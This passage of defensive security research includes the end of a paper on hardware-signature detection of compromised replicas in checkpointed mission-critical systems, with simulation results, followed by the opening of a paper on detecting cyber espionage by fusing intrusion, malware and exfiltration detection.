al. 2007). However, as the attacks become more complex, it becomes harder to detect any faulty or<br />
malicious behavior (Wagner and Soto 2002). Moreover, if one replica is compromised, the adversary<br />
holds the key to other replicas too. To counter this problem, researchers have proposed spatial<br />
diversity in software. Spatial diversity can slow down an adversary but eventually the compromise of<br />
all diverse replicas is possible. Therefore, it was further proposed to introduce time diversity along<br />
with the spatial diversity. Time diversity modifies the state of the recovered system (OS access<br />
passwords, open ports, authentication methods, etc.). This is to assure that an attacker is unable to<br />
exploit the same vulnerabilities that he had exploited before (Bessani et al. 2008).<br />
3. Threat model<br />
We developed an extensive threat model to analyze security logically in a wide range of scenarios.<br />
Assume that we have n replicas in a mission-critical application and the system can tolerate the failure<br />
of up to f replicas during the entire mission.<br />
Scenario 1: Attacks on Byzantine fault-tolerant protocols<br />
Assume that no design diversity is introduced in a replicated system. During the mission lifetime, an<br />
adversary can easily compromise f+1 identical replicas and bring down the system.<br />
Scenario 2: Attacks on proactive recovery protocols<br />
In proactive recovery, the whole system is rejuvenated periodically. However, the adversary becomes<br />
more and more knowledgeable as his attacks evolve with each successful/failed attempt. So it is only<br />
a matter of time before he is able to compromise f+1 replicas between periodic rejuvenations.<br />
Furthermore, the compromised replicas can disrupt the system’s normal functioning in many ways, such as<br />
creating extra traffic so that recovery is delayed and the adversary gains more time to compromise f+1<br />
replicas (Sousa et al. 2007). This is a classic case of attacking the recovery phase.<br />
Scenario 3: Attacks on proactive-reactive recovery protocols<br />
Proactive-reactive recovery solves several major problems, except that if the compromised node is<br />
recovered by restoring the same state that was previously attacked, the attacker will already know the<br />
vulnerabilities (Sousa et al. 2007). In this case, a persistent attacker may get faster with time, or may<br />
invoke many reactive recoveries, exhausting the system resources. A large number of recoveries also<br />
adversely affects system availability. This is also an instance of attacking the recovery phase.<br />
Furthermore, arbitrary faults are very difficult to detect (Haeberlen et al. 2006).<br />
Scenario 4: Attacks on proactive-reactive recovery with spatial diversity<br />
Spatial diversity in replicas has been proposed as a relatively stronger security solution. It can be difficult<br />
and more time-consuming for the adversary to compromise f+1 diverse replicas, but compromising these<br />
diverse replicas eventually is possible, especially for long-running applications. Also, most of<br />
the existing systems are not spatially diverse, and introducing spatial diversity into existing systems is<br />
expensive.<br />
Time diversity has been suggested to complement the spatial diversity so as to make it almost<br />
impossible to predict the new state of the system (Bessani et al. 2008). The complexity involved in<br />
implementing time diversity in a workable solution is very high, because it will have to deal with on-the-fly<br />
compatibility issues and much more. Besides, updating replicas and other communication<br />
protocols consumes considerable time and resources. A decent workable solution employing spatial<br />
diversity still needs a lot of work (Banatre et al. 2007), so employing time diversity is a step planned<br />
too far into the future.<br />
Scenario 5: The quiet invader<br />
In the presence or absence of spatial diversity, an adversary may be able to quietly investigate a few selected<br />
nodes and play along with the protocol to avoid getting caught and gain more time to<br />
understand the system. After gathering enough information, the adversary can design attacks for f+1<br />
replicas and launch them all at once when he is ready or when the mission enters a<br />
critical stage. If these attacks are not detected or dealt with in time, the system fails. This is an<br />
evasive attack strategy for subverting the detection and recovery phases. Similar threat models have<br />
been discussed in the literature previously (Todd et al. 2007, Del Carlo 2003).<br />
Scenario 6: The physical access threat<br />
Sometimes system nodes are deployed in an environment where physical access to them is a highly<br />
probable threat. For instance, in the case of wireless sensor network deployment, sensor nodes are<br />
highly susceptible to physical capture. To prevent such attacks, we need to capture any changes in<br />
the physical environment of a node. A reasonable solution may involve attaching motion sensors to<br />
each node. Any unexpected readings from these motion sensors will indicate a possible threat and<br />
then our scheme can be used to assure the mission.<br />
4. System design<br />
4.1 Assumptions<br />
We work with a simplified, centralized architecture of a mission critical application in order to describe<br />
and evaluate the proposed scheme. No spatial or time diversity is assumed, though our scheme will<br />
work with any kind of diversity.<br />
The network can lose, duplicate or reorder messages but is immune to partitioning. The coordinator<br />
(central authority and trusted computing base) is responsible for periodic checkpointing in order to<br />
maintain a consistent global state. The stable storage at the coordinator holds the recovery data through<br />
all the tolerated failures and their corresponding recoveries. We assume sequential and equidistant<br />
checkpointing (Elnozahy et al. 2002).<br />
The replicas are assumed to be running on identical hardware platforms. Each node has advanced<br />
CPU (Central processing unit) and memory subsystems along with the test logic (in the form of DFT<br />
and BIST) that is generally used for manufacture test. Refer to Fig. 1(a). All the chips comply with the<br />
IEEE 1149.1 JTAG standard (Abramovici and Stroud 2001). Fig. 1(b) elaborates on the test logic and<br />
boundary scan cells corresponding to the assumed hardware.<br />
We assume a software tripwire running on each replica that can be used to detect a variety of<br />
anomalies at the host. By instrumenting the openly available tripwire source code (Hrivnak 2002), we<br />
can direct the "intrusion alert/alarm" to a set of system registers (using low-level coding). The triggered<br />
and latched hardware signature will be read out by taking a snapshot of the system registers using<br />
the “scan-out” mode of the observation logic associated with the DFT hardware. The bit pattern will be<br />
brought out to the CPU ports using the IEEE 1149.1 JTAG instruction set in a tamper-resistant<br />
manner. Once it is brought out of the chip, it will be securely sent to the coordinator for verification and<br />
further action. This way, the system will be able to surreptitiously diagnose the adversary’s action.<br />
4.2 Conceptual basics<br />
We present a simple and practical alternative to the spatial/time diversity solutions in order to increase<br />
the resilience of a fault tolerant system against benign faults and malicious attacks. In particular, this<br />
is to address the threat of a quiet invader (Scenario 5 of Section 3). An adversary needs to<br />
compromise f+1 replicas out of the n correctly working replicas in order to affect the result of a<br />
majority consensus protocol and disrupt the mission.<br />
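The arithmetic behind this f+1 threshold can be illustrated with a toy majority vote over n = 2f + 1 replicas. The sketch below is ours, for illustration only, not part of the cited protocols.<br />

```python
from collections import Counter

def majority_vote(values):
    """Return the strict-majority value, or None when no value has one."""
    value, count = Counter(values).most_common(1)[0]
    return value if count > len(values) // 2 else None

f = 2
n = 2 * f + 1                           # classic n = 2f + 1 replica configuration
honest = ["ok"] * f                     # only f healthy replicas remain
compromised = ["bad"] * (f + 1)         # adversary controls f + 1 replicas
print(majority_vote(honest + compromised))   # → bad: the consensus is subverted
```

With f or fewer compromised replicas the honest value still wins, which is exactly the bound the proposed scheme defends by quietly ousting identified replicas from the vote.<br />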
Figure 1(a): Replicated hardware<br />
Figure 1(b): Capturing signature<br />
The key idea is to detect a system compromise by a smart adversary who has taken over some<br />
replicas (or has gained sufficient information about them) but is playing along in order to gain more<br />
time. From the defender’s point of view, if the system knows which of the n replicas have become<br />
untrustworthy, the mission can still succeed with the help of the surviving healthy replicas. Smart<br />
attackers try to minimize the risk of getting caught by compromising only the minimum number of<br />
replicas required in order to subvert the entire system. Aggressive attackers can be clearly and easily<br />
detected and thus their attacks can be recovered from. So a smart defender should be able to detect<br />
the attacks surreptitiously so as not to make the attacker aggressive. This especially holds for the<br />
cases when a smart attacker has been hiding for long and the mission is nearing completion. At this<br />
stage, the priority is not to identify the attacker but to complete the mission securely.<br />
The proposed scheme offers passive detection and recovery, in order to assure the adversary of its<br />
apparent success and so prevent him from getting more aggressive. At some later stage, when the<br />
adversary launches an attack to fail f+1 replicas at once, the attack fails because those replicas have<br />
already been identified and ousted from the voting process without the knowledge of the attacker. In<br />
our solution, we require that there should be at least two correctly working replicas to provide a duplex<br />
system at a minimum, for the mission to succeed. The advantage of this approach is that in the worst<br />
case where all the replicas are compromised, the system will not deliver a result, rather than<br />
delivering a wrong one. This is a necessary condition for many safety-critical missions. Note that if an<br />
adversary can compromise a replica by gaining root privilege over its user-space components, no<br />
solution developed in user space can remain secure and tamper-resistant. Therefore, our paradigm<br />
detects node compromise through a verification scheme implementable in low-level hardware. We use<br />
software- or hardware-driven tripwires that detect ongoing suspicious activity and trigger a hardware<br />
signature that indicates the integrity status of a replica. This signature is generated without affecting<br />
the application layer, and hence the attacker remains oblivious of this activity. Also, a smart attacker is<br />
not likely to monitor the system thoroughly as that may lead to detection. This signature is then<br />
securely collected and sent to the coordinator that performs the necessary action.<br />
4.3 Checkpointing<br />
In our simplified application, the checkpointing module attached to the coordinator establishes a<br />
consistent global checkpoint and carries out the voting procedures that detect anomalies due to<br />
faults, attacks, or both.<br />
The coordinator starts the checkpointing/voting process by broadcasting a request message to all the<br />
replicas, asking them to take checkpoints. It also initiates a local timer that runs out if the coordinator<br />
does not receive the expected number of replies within a specific time frame. On receiving this<br />
message, all the replicas pause their respective executions and take a checkpoint. These checkpoints<br />
are then sent over the network to the coordinator through a secure channel using encryption. On<br />
receiving the expected number of checkpoints, the coordinator compares them for consistency. If all<br />
checkpoints are consistent, it broadcasts a commit message that completes the two-phase checkpoint<br />
protocol. After receiving the commit message, all the replicas resume their respective executions. This<br />
is how the replicas execute in lockstep. If the timer runs out before the expected number of<br />
checkpoints is received, the coordinator sends out another request message. All the replicas<br />
send their last locally stored checkpoints as a reply to this request message. In our application, we<br />
have limited the number of repeated checkpoint requests to three per non-replying replica. If a replica<br />
does not reply to three (or a threshold count) checkpoint request messages, it is considered dead by<br />
the coordinator and a commit message is sent to the rest of the replicas if their checkpoints are<br />
consistent. If the checkpoints are not consistent, the coordinator replies with a rollback<br />
message to all the replicas. This rollback message includes the last consistent checkpoint that was<br />
stored on the stable storage at the coordinator. All the replicas then return to the previous state of<br />
execution as defined by the rollback message. If a certain replica fails to deliver a consistent checkpoint<br />
and causes more than three (or a threshold count) consecutive rollbacks, the fault is considered<br />
permanent and the replica is excluded from the system.<br />
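The two-phase round described above can be sketched as follows. This is a minimal in-memory illustration; the `Replica` class and method names are ours, not the paper's, and the network transport, encryption, and timers of the real system are omitted.<br />

```python
# Minimal sketch of the coordinator's two-phase checkpoint round.
# Replica is an in-memory stand-in for a networked node (illustrative only).

MAX_RETRIES = 3  # checkpoint requests sent per non-replying replica

class Replica:
    def __init__(self, node_id, state, alive=True):
        self.node_id, self.state, self.alive = node_id, state, alive
        self.committed = False

    def take_checkpoint(self):
        # a dead replica never answers the coordinator's request
        return self.state if self.alive else None

def checkpoint_round(replicas, last_consistent):
    """One coordinator round: request checkpoints, compare, commit or rollback."""
    checkpoints = {}
    for _ in range(MAX_RETRIES):                    # phase 1: request/collect
        for r in replicas:
            if r.node_id not in checkpoints:
                cp = r.take_checkpoint()
                if cp is not None:
                    checkpoints[r.node_id] = cp
        if len(checkpoints) == len(replicas):
            break
    # replicas silent after MAX_RETRIES requests are considered dead
    alive = [r for r in replicas if r.node_id in checkpoints]
    values = [checkpoints[r.node_id] for r in alive]
    if values and all(v == values[0] for v in values):
        for r in alive:                             # phase 2: commit
            r.committed = True
        return ("commit", values[0])
    return ("rollback", last_consistent)            # phase 2: rollback
```

For instance, a round with two consistent replicas and one dead one commits, while a round containing an inconsistent checkpoint rolls every replica back to the last consistent state held by the coordinator.<br />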
A hardware signature is generated at each replica and piggybacked on the checkpoint when it is sent<br />
to the coordinator. This signature quantifies the integrity status of the replica since the last successful<br />
checkpoint. For simplicity, we use the values – all-0s (for an uncompromised replica) and all-1s (for a<br />
compromised replica). A host-based intrusion detection sensor at all the replicas is responsible for<br />
generating these signatures. If the coordinator finds any hardware signature to be all-1s, then the<br />
corresponding replica is blacklisted and any of its future results/checkpoints are ignored at the<br />
coordinator. However, the coordinator continues normal communication with the blacklisted replica to<br />
keep the attacker unaware of this discovery.<br />
Finally, all the results from each of the non-blacklisted replicas will be voted upon by the coordinator<br />
for the final result.<br />
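A minimal sketch of how the piggybacked signatures might feed this voting step, assuming the all-0s/all-1s convention above. The function names and the simple majority rule are illustrative, not taken from the paper; the duplex requirement of at least two agreeing healthy replicas is reflected in the vote threshold.<br />

```python
# Illustrative coordinator-side fusion of hardware signatures and results:
# all-1s replicas are silently blacklisted, and only the remaining replicas'
# results are voted on.
from collections import Counter

ALL_ONES = 0xFFFFFFFF  # compromised replica; all-0s means uncompromised

def vote(reports, blacklist):
    """reports: {replica_id: (signature, result)} for one round."""
    for rid, (sig, _) in reports.items():
        if sig == ALL_ONES:
            blacklist.add(rid)   # keep talking to it, but ignore its results
    counted = Counter(res for rid, (_, res) in reports.items()
                      if rid not in blacklist)
    if not counted:
        return None              # worst case: deliver no result, not a wrong one
    result, votes = counted.most_common(1)[0]
    return result if votes >= 2 else None  # duplex minimum: two agreeing replicas
```

Note that a blacklisted replica keeps appearing in `reports`, so from the attacker's perspective nothing changes; only the coordinator's tally ignores it.<br />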
4.4 Using built-in test logic for hardware signature generation and propagation<br />
As described under assumptions, the system uses a software-driven tripwire that monitors the<br />
system continuously for a specified range of anomalies. The tripwire raises an alarm on detecting an<br />
anomaly by setting a designated system register to all-1s (all-0s otherwise). This<br />
value then becomes the integrity status indicator for the replica and is read out using the scan-out<br />
mode of the test logic. It is then securely sent to the coordinator for verification.<br />
5. Performance analysis<br />
Most mission-critical military applications that employ checkpointing or proactive security tend to be<br />
long-running, for instance a rocket launch countdown that runs for hours or days. Therefore, our<br />
performance analysis focuses on long-running applications and their overall execution time.<br />
Since our scheme uses built-in hardware to implement security, and security-related notifications<br />
piggyback on the checkpointing messages, security comes nearly free for systems that already use<br />
checkpointing for fault tolerance. However, legacy systems that do not use checkpointing will need to<br />
adopt it before they can benefit from our scheme; in such cases, the cost of checkpointing is included<br />
in the cost of employing our security scheme. To cover<br />
all these possibilities, we consider the following three cases.<br />
Case 1: This case includes all the mission critical legacy systems that do not employ checkpointing or<br />
security.<br />
Case 2: This case examines mission critical systems that employ checkpointing as a safety measure<br />
in the absence of any failures or attacks. Note that this will be the worst case scenario for Case 1<br />
systems that may adopt our scheme because there are practically no faults/attacks. Also, our security<br />
scheme is nearly free for Case 2 systems, if they choose to employ it.<br />
Case 3: The systems considered under Case 3 employ checkpointing and our proposed security<br />
scheme (hardware signature verification). This case considers the occurrence of failures and<br />
security-related attacks.<br />
These three cases allow us to study the cost of adopting our security scheme in all possible<br />
scenarios.<br />
Since the proposed system is composed of both hardware and software subsystems, we could not<br />
use one standard simulation engine to simulate the entire application accurately and obtain data.<br />
Therefore, we combined the results obtained from individually simulating the software and the<br />
hardware components using our multi-step simulation approach (Mehresh et al. 2010).<br />
5.1 Simplified system prototype development<br />
Figure 2 shows the modular design of the simplified system for mission critical applications with n<br />
replicas. The coordinator is the core of this centralized replicated system. It is responsible for voting<br />
operations on intermediate results, integrity signatures and checkpoints obtained from the replicas.<br />
The heartbeat manager broadcasts periodic ping messages to determine if the nodes are alive. The<br />
replicas are identical copies of the workload executing in parallel in lockstep.<br />
Figure 2: Overall system design<br />
5.2 Multi-step simulation approach<br />
We use a multi-step simulation approach to evaluate the system performance for the three cases.<br />
This new approach is required because there are currently no benchmarks for evaluating such<br />
systems. A combination of pilot system implementation and simulation is used to obtain more realistic<br />
and statistically accurate results.<br />
Different components of this evaluation include a Java implementation based on Chameleon<br />
ARMORs (Kalbarczyk et al. 1999), ARENA simulation (http://www.arenasimulation.com/) and<br />
Cadence simulation (http://www.cadence.com). ARENA is a discrete-event simulator that models the<br />
given system at a high level of abstraction. The lower levels of abstraction, which become too<br />
complex to model, are parameterized using data obtained from experiments with the Java system<br />
prototype. Another reason for using the ARENA simulator is the analysis of long-running<br />
mission-critical applications, for which real-time experiments are inefficient and extremely<br />
time-consuming. The Java prototype uses socket programming across a network with 100 Mbps<br />
bandwidth. The performance experiments were conducted on a Windows platform with<br />
an Intel Core Duo 2 GHz processor and 2 GB RAM. Cadence simulation is primarily used for the<br />
feasibility study of the proposed hardware scheme. To verify the precision of our simulators, test<br />
cases were developed and deployed for known cases of operation.<br />
This system accepts workloads from the user and executes them in a fault tolerant environment. We<br />
used the Java SciMark 2.0 workloads as user inputs in this system prototype. The four workloads that<br />
we used are: Fast Fourier Transform (FFT), Jacobi Successive Over-relaxation (SOR), Sparse Matrix<br />
multiplication (Sparse) and Dense LU matrix Factorization (LU). The standard large data sets<br />
(http://math.nist.gov/scimark2) were used.<br />
Data sets from short-running replicated experiments were collected, and fitted probability distributions<br />
were obtained using the ARENA input data analyzer. These distributions defined the stochastic<br />
parameters for the ARENA simulation model.<br />
We examine the feasibility of the hardware component of this architecture (as described under<br />
assumptions) as follows. The integrity signature of a replica is stored in the flip-flops of the boundary-scan<br />
chain around a processor. This part of our simulation is centered on a boundary-scan-inserted<br />
DLX processor (Patterson and Hennessy 1994), whose Verilog code is elaborated in the Cadence<br />
RTL Compiler. To load the signature into the scan cells, a multiplexer is inserted before each cell,<br />
with one input taken from the test data input (TDI) and the other from the 32-bit signature vector.<br />
Depending on the select line, either the test data or the signature is latched into the flip-flops of the<br />
scan cells. To read the signature out, the bits are serially shifted from the flip-flops onto the output bus.<br />
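The load and scan-out path can be pictured with a small bit-level model. This is a Python stand-in for the Verilog boundary-scan design (the function names and register width handling are ours), intended only to illustrate the multiplexer selection and serial shift-out, not the actual RTL.<br />

```python
# Bit-level model of the signature path: each scan cell's multiplexer selects
# either TDI test data or one bit of the signature vector, and the latched
# bits are then shifted serially onto the output bus.

WIDTH = 32  # signature register width

def load_cells(select_signature, signature, tdi_bits):
    """Per-cell multiplexer: latch either the signature or TDI test data."""
    src = signature if select_signature else tdi_bits
    return [(src >> i) & 1 for i in range(WIDTH)]

def shift_out(cells):
    """Serially shift the scan-chain contents out and reassemble the word."""
    word = 0
    for i, bit in enumerate(cells):
        word |= bit << i
    return word
```

For example, `shift_out(load_cells(True, 0xFFFFFFFF, 0))` recovers the all-1s signature that marks a compromised replica, while selecting the TDI input leaves ordinary test data flowing through the chain.<br />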
5.3 Results<br />
We analyze the prototype system for the three cases described earlier. Since we want to evaluate the<br />
performance of this system in the worst case scenario where the checkpointing overhead is<br />
maximum, we choose sequential checkpointing (Elnozahy et al. 2002). For the following analysis<br />
(unless otherwise mentioned), the checkpoint interval is assumed to be 1 hour. Table 1 presents the execution<br />
times for the four Scimark workloads. The values from Table 1 are plotted in Figure 3 on a logarithmic<br />
scale. We can see that the execution time overhead increases a little when the system shifts from<br />
Case 1 to Case 2 (i.e., employing our scheme as a preventive measure). However, the execution time<br />
overhead increases rapidly when the system moves from Case 2 to Case 3. The execution overhead<br />
increases substantially only when many faults are present, in which case the added cost buys the<br />
accompanying fault tolerance and security. As the values in Table 1 show, an<br />
application that runs for 13.6562 hours will incur an execution time overhead of only 13.49 minutes in<br />
moving from Case 1 to Case 2.<br />
Figure 3: Execution times for Scimark workloads across three cases, on a logarithmic scale<br />
Figure 4 shows the percentage increase in execution times of various workloads when the system<br />
upgrades from a lower case to a higher one. It is assumed that these workload executions do not<br />
have any interactions (inputs/outputs) with the external environment. The percentage increase in<br />
execution times of all the workloads when the system upgrades from Case 1 to Case 2 is only around<br />
1.6%. An upgrade from Case 1 to Case 3 (with mean time to fault, M=10) is around 9%. These<br />
percentages indicate acceptable overheads.<br />
Table 1: Execution times (in hours) for the Scimark workloads across three cases<br />
                 FFT        LU        SOR       Sparse<br />
Case 1           3421.09    222.69    13.6562   23.9479<br />
Case 2           3477.46    226.36    13.8811   24.3426<br />
Case 3 (M=10)    3824.63    249.08    15.2026   26.7313<br />
Case 3 (M=25)    3593.39    233.83    13.8811   24.3426<br />
Figure 4: Percentage execution time overheads incurred by the Scimark workloads while shifting<br />
between cases<br />
As Table 1 shows, for a checkpoint interval of 1 hour and M=10, the workload LU executes for<br />
approximately 10 days. Figure 5 shows the effect of increasing checkpoint interval for workload LU for<br />
different values of M ranging from 5 to 25. The optimal checkpoint interval values (and the<br />
corresponding execution times) for the graph plots in Figure 5 are provided in Table 2.<br />
Figure 5: Effect of checkpoint interval on workload execution times at different values of M<br />
Note that we used the multi-step approach for this simulation and the parameters for the simulation<br />
model were derived from experimentation. Therefore, these results do not just represent the data<br />
trends but are also close to the statistically expected real-world values.<br />
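The trade-off underlying these plots (longer checkpoint intervals save checkpointing overhead but lengthen re-execution after a fault) is often captured by Young's first-order approximation, T_opt = sqrt(2CM), where C is the cost of taking one checkpoint and M the mean time to fault. The sketch below uses an assumed checkpoint cost and is purely illustrative; the paper's optimal values come from simulation, not from this formula.<br />

```python
# Young's first-order approximation for the optimal checkpoint interval.
# The checkpoint cost C below is an assumed value (45 seconds), chosen only
# to illustrate how T_opt grows with the mean time to fault M.
import math

def young_interval(checkpoint_cost_h, mttf_h):
    """T_opt = sqrt(2 * C * M), all quantities in hours."""
    return math.sqrt(2.0 * checkpoint_cost_h * mttf_h)

C = 0.0125  # assumed cost of one checkpoint, in hours
for M in (5, 10, 15, 25):
    print(f"M={M:>2} h -> T_opt ~ {young_interval(C, M):.2f} h")
```

The qualitative behavior matches the plots: as faults become rarer (larger M), the optimal interval grows and the total execution time drops.<br />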
Table 2: Approximate optimal checkpoint interval values and their corresponding workload execution<br />
times for LU (Case 3) at different values of M<br />
                                        M=5      M=10     M=15     M=25<br />
Optimal Checkpoint Interval (hours)     0.3      0.5      0.65     0.95<br />
Execution Times (hours)                 248.97   241.57   238.16   235.06<br />
6. Conclusion<br />
This paper proposes a hardware-based proactive solution to secure the recovery phase of mission-critical<br />
applications. A detailed threat model is developed to analyze the security provided by our<br />
scheme. The biggest strengths of this research are its ability to deal with smart adversaries, its priority<br />
on mission assurance, and its use of redundant hardware to capture the integrity status of a replica<br />
outside the user space. Since the scheme is simple and has no visible application-specific<br />
dependencies, its implementation has the potential to be application-transparent. For performance<br />
evaluation, we investigated a simplified mission-critical application prototype using a multi-step<br />
simulation approach. In future work, we plan to extend the centralized architecture to a distributed system.<br />
We defined cases to investigate the cost involved in applying our security scheme to all kinds of<br />
systems (including the legacy systems with no fault tolerance). The performance evaluation showed<br />
promising results and the cost/performance overhead is only a small percentage of the original<br />
execution times when faults are absent. As the rate of fault occurrence increases, the overhead<br />
increases too, but this additional overhead comes with fault tolerance and security. Overall, we<br />
believe that our solution provides strong security at low cost for mission critical applications.<br />
Acknowledgments<br />
This work was supported in part by ITT Grant No. 200821J. This paper has been approved for Public<br />
Release; Distribution Unlimited: 88ABW-2010-6094 dated 16 Nov 2010.<br />
References<br />
Abramovici, M. and Stroud, C.E. (2001) "BIST-based test and diagnosis of FPGA logic blocks", IEEE<br />
Transactions on VLSI Systems, volume 9, number 1, pages 159-172, February.<br />
Banatre, M., Pataricza, A., Moorsel, A., Palanque, P. and Strigini, L. (2007) From Resilience-Building to<br />
Resilience-Scaling Technologies: Directions – ReSIST, NoE Deliverable D13, DI/FCUL TR 07–28, Dept. of<br />
Informatics, Univ. of Lisbon, November.<br />
Bessani, A., Reiser, H.P., Sousa, P., Gashi, I., Stankovic, V., Distler, T., Kapitza, R., Daidone, A. and Obelheiro,<br />
R. (2008) “FOREVER: Fault/intrusiOn REmoVal through Evolution & Recovery”, Proceedings of the ACM<br />
Middleware'08 companion, December.<br />
Del Carlo, C. (2003) Intrusion detection evasion, SANS Institute InfoSec Reading Room, May.<br />
Elnozahy, E.N., Alvisi, L., Wang, Y. and Johnson, D.B. (2002) "A survey of rollback-recovery protocols in<br />
message-passing systems", ACM Computing Surveys (CSUR), volume 34 number 3, pages 375-408,<br />
September.<br />
Haeberlen, A., Kouznetsov, P. and Druschel, P. (2006) “The case for Byzantine fault detection”, Proceedings of<br />
the 2nd conference on Hot Topics in System Dependability, volume 2, November.<br />
Hrivnak, A. (2002) Host Based Intrusion Detection: An Overview of Tripwire and Intruder Alert, SANS Institute<br />
InfoSec Reading Room, January.<br />
Kalbarczyk, Z., Iyer, R.K., Bagchi, S. and Whisnant, K. (1999) "Chameleon: a software infrastructure for adaptive<br />
fault tolerance", IEEE Transactions on Parallel and Distributed Systems, volume 10, number 6, pages 560-<br />
579, June.<br />
Mehresh, R., Upadhyaya, S. and Kwiat, K. (2010) “A Multi-Step Simulation Approach Toward Fault Tolerant<br />
System Evaluation”, Third International Workshop on Dependable Network Computing and Mobile Systems,<br />
October.<br />
Patterson, D. and Hennessy, J. (1994) Computer Organization and Design: The Hardware/Software<br />
Interface, Morgan Kaufmann.<br />
Sousa, P., Bessani, A., Correia, M., Neves, N.F. and Verissimo, P. (2007) “Resilient intrusion tolerance through<br />
proactive and reactive recovery”, Proceedings of the 13th IEEE Pacific Rim Int. Symp. on Dependable<br />
Computing, pages 373–380, December.<br />
Todd, A.D., Raines, R.A., Baldwin, R.O., Mullins, B.E. and Rogers, S.K. (2007) “Alert Verification Evasion<br />
Through Server Response Forging”, Proceedings of the 10th International Symposium, RAID, pages 256-<br />
275, September.<br />
Wagner, D. and Soto, P. (2002) “Mimicry attacks on host-based intrusion detection systems”, Proceedings of the<br />
9th ACM conference on Computer and communications security, November.<br />
Identifying Cyber Espionage: Towards a Synthesis<br />
Approach<br />
David Merritt and Barry Mullins<br />
Air Force Institute of Technology, Wright Patterson Air Force Base, Ohio, USA<br />
david.merritt@afit.edu<br />
barry.mullins@afit.edu<br />
Abstract: Espionage has existed in many forms for as long as humans have kept secrets. With the skyrocketing<br />
growth of digital data storage, cyber espionage has quickly become the tool of choice for corporate and<br />
government spies. Cyber espionage typically occurs over the Internet with a consistent methodology: 1) infiltrate<br />
a targeted network, 2) install malware on the targeted victim(s), and 3) exfiltrate data at will. Detection methods<br />
exist and are well-researched for these three realms: network attack, malware, and data exfiltration. However,<br />
formal methodology does not exist for identifying cyber espionage as its own classification of cyber attack. This<br />
paper proposes a synthesis approach for identifying targeted espionage by fusing the intelligence gathered from<br />
current detection techniques. This synthesis of detection methods establishes a formal decision-making<br />
framework for determining the likelihood of cyber espionage.<br />
Keywords: covert channel, cyber espionage, data exfiltration, intrusion detection, malware analysis<br />
1. Introduction and background<br />
The cyber espionage threat is real. Because of the low cost of entry into and the anonymity afforded<br />
by the Internet realm, any curious or incentivized person can steal secret information off private<br />
computer networks (US-China, 2008). If a spy steals proprietary knowledge of a private company's<br />
innovative product research and development, then this data holds a high monetary value, reportedly<br />
billions of dollars, to an industry competitor (Epstein, 2008). If that stolen information is sensitive to<br />
national defense or national strategy decision-making, then the value is arguably immeasurable.<br />
A consistently effective defense against cyber espionage requires a consistently effective way to<br />
identify it. While there are methodologies to detect facets of cyber espionage, there is no formal<br />
approach for identifying cyber espionage as a stand-alone network event classification in its own right.<br />
This paper proposes a new approach that uses the synthesis of current cyber warfare detection and<br />
analysis techniques in a framework to holistically identify malicious or suspicious network events as<br />
cyber espionage.<br />
Due to the myriad of network attack methods and traditional espionage techniques, this paper cannot<br />
comprehensively address all techniques that a cyber spy would employ to achieve his mission (e.g.,<br />
insider threat or physical access). Instead, the paper focuses on the most common method of<br />
performing cyber espionage from a remote location outside the victims’ local network. Historically, the<br />
most common method for infiltrating a network for this purpose is through targeted spear phishing<br />
emails with malicious file attachments (SANS Institute, 2008). Both the emails and attachments are<br />
products of effective social engineering methods that tailor the content to the recipients of the emails.<br />
When an unsuspecting, targeted user opens the attachment, the malware, and therefore the cyber<br />
spy, establish a foothold on the computer and affected network. The spy can then use his specialized<br />
malware to search for interesting data on the victim computer and network and exfiltrate this<br />
potentially sensitive data from the victim network to a place of his choosing.<br />
The synthesis approach and decision-making framework proposed in this paper allow a network<br />
defender to correctly identify this kind of targeted cyber espionage event. If this methodology is to<br />
catch cyber spies targeting specific victims, then this detection approach must look at each malicious<br />
activity (i.e., network infiltration, malware installation, and data exfiltration) within the context of the<br />
whole espionage event. This approach does not attempt to introduce new ways to detect network<br />
attacks, malware infections, or data exfiltration beyond the bounds of the current field of research.<br />
Rather, the current detection methods are integrated in a new way that yields a synthesis approach to<br />
categorize cyber espionage events. The paper first discusses techniques to detect each of the spy's<br />
three steps to espionage success, and then the synthesis approach and resulting framework are<br />
explained. Section 2 reviews network infiltration detection methods. Section 3 looks at detecting<br />
malware on a computer. Section 4 discusses the detection of data exfiltration. Section 5 poses the<br />
synthesis detection approach, followed by a conclusion and discussion of future work in Section 6.<br />
2. Network infiltration detection<br />
Intrusion detection helps us answer the question: “Is there a malicious intrusion into the network?”<br />
Because there are countless manual and automated mechanisms to identify suspicious network<br />
behavior, this section will only discuss the most common techniques for intrusion detection. This<br />
glimpse into intrusion detection serves as a backdrop for the explanation of the synthesis approach,<br />
which assumes that network infiltration can be detected somewhat reliably.<br />
A network-based intrusion detection system (NIDS) detects network-oriented attacks and traditionally<br />
monitors the access points into a network. If a cyber spy chooses a common network attack method<br />
to infiltrate a network, such as a common buffer overflow exploit, then the NIDS will have a high<br />
detection success rate (Patcha and Park, 2007: 3448-3470). If there is a novel or sophisticated attack<br />
that is difficult to detect, NIDS relies on its anomaly detection capability. Kuang and Zulkernine (2008:<br />
921-926) have shown that an anomaly-based NIDS employing the Combined Strangeness and<br />
Isolation measure K-Nearest Neighbors algorithm can accurately identify novel attacks at a detection<br />
rate of 94.6%, where the detection rate is defined as the ratio of correctly classified network intrusion<br />
samples to the total number of samples.<br />
3. Malware detection<br />
Malware detection helps us answer the question: “Is there something malicious happening on a<br />
host?” This section is not an exhaustive survey of all malware detection mechanisms and methods.<br />
Rather, it simply makes evident the fact that there are numerous ways to reliably detect most malware<br />
on a system. Malware comes in many forms with many names. For simplicity and convenience, we<br />
will refer to any unwanted and malicious program or code running on a system as malware. Naturally,<br />
detection of unknown malware is the goal, assuming the cyber spy will use sophisticated, novel<br />
malicious programs to establish footholds on a computer and within a network.<br />
3.1 Antivirus<br />
Antivirus, or anti-malware, software does not need much explanation as it is a commonly used and<br />
moderately understood term. Antivirus products rely primarily on signature-based detection, although<br />
most products have integrated at least a rudimentary mechanism for behavioral analysis of<br />
executables. The vast majority of known malware is caught by commodity software. As a point of<br />
reference, most antivirus products have proven they can detect malware in sample sizes of over one<br />
million with accuracy in the upper 90th percentile (Virus Bulletin, 2008).<br />
3.2 Malware analysis<br />
There are historically two methods of analyzing unknown programs, or binaries: static and dynamic<br />
(Ding et al, 2009: 72-77). Static analysis starts with the conversion of a program from its binary<br />
representation to a more symbolic, human-readable version of assembly code instructions. This<br />
disassembly ideally takes into account all possible code execution paths of the unknown program,<br />
which provides a reverse engineer with the complete set of program instructions and therefore inner<br />
workings of the unknown program’s code. Analyzing this code to discover a program’s purpose and<br />
capabilities makes up the bulk of static analysis. Christodorescu et al (2005: 32-46) and Kruegel,<br />
